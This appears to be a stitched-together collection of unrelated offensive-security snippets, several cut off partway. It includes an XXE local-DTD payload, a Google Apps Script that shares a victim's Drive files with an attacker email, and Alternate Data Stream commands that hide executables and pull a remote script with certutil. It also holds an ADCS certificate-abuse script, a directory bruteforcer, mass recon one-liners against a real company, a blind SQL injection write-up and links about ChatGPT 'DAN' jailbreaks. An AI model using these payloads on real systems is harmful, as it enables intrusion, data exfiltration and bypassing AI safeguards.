srand2

#!/bin/env python3

import argparse
import datetime
import re
import sys
import uuid

###############################################################################
# Based off of Daniel Thatcher's guid tool

srand2

#pip install ecdsa
#
import base64
import hashlib
from hashlib import sha256
import hmac

from ecdsa.ecdsa import Signature, generator_256

from ecdsa import VerifyingKey, NIST256p

srand2

<!DOCTYPE doc [
    <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
    <!ENTITY % SuperClass '>
        <!ENTITY &#x25; file SYSTEM "http://example.com:9200/_cat/indices">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
      <!ENTITY test "test"'
    >
    %local_dtd;

srand2

Chat GPT "DAN" (and other "Jailbreaks")

• https://chat.openai.com/
• Is ChatGPT "DAN" Real? Gonna find out [Part 1]
  (https://www.youtube.com/watch?v=-q8woRG9FrI)
• Part 2: I thought ChatGPT DAN was a hoax, but...
  (https://www.youtube.com/watch?v=rHZRrDu3A2U&lc=UgxfrxX8aK7gnCzkend4AaABAg)

srand2

curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json |jq -r '.vulnerabilities[].cveID' > cves.txt

subfinder -d tesla.com -silent |dnsx -silent -a -resp-only |sort -u |xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% |grep "CIDR" |cut -d : -f2 |tr , "\n"| awk '{$1=$1};1' |sort -u |egrep -v "/8|/9|/10|/11|/12|/13|/14|/15|/16" |while read ip ;do whois -h whois.cymru.com " -v $ip" ;done |grep -v "BGP Prefix" |cut -d '|' -f3  |awk '{$1=$1};1' |sort -u |cidr2ip |sort -u |nrich - |grep -B4 -f cves.txt | tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt

srand2

import asyncio
import aiohttp
import time
import sys
import argparse
import os

parser = argparse.ArgumentParser(description='Directory Bruteforce')
parser.add_argument('-u', '--url', help='URL to bruteforce', required=True)
parser.add_argument('-w', '--wordlist', help='Wordlist to use', required=True)

srand2

function driveSearch() {
  // Setup the exfil folder
  var user = Session.getActiveUser().getEmail();
  var folder = DriveApp.createFolder(user);
  var attackerEmail = "ahhh.db@gmail.com";
  folder.addViewer(attackerEmail);
  
  // Search Drive
  var files = DriveApp.searchFiles('hidden = false');
  // Iterate through files in Drive

srand2

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

srand2

#Thank you @NotMedic for troubleshooting/validating stuff!

$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!

$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. 
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER

srand2

Using Blind SQL Injections to Retrieve Access Credentials of a Website

In this gist I show how I leveraged a boolean-blind sql injection to gain access to a protected website. The injection allowed me query the website database and retrieve a valid pair username/password. Using the retrieved credentials I was able to login into the protected section of the website.

Software Used

To perform the attack I used:

• sqlmap to discover the website was vulnerable to SQL injections.
• Burp Suite to forge and send POST requests to the website login page, carrying payloads opportunely crafted with SQL queries.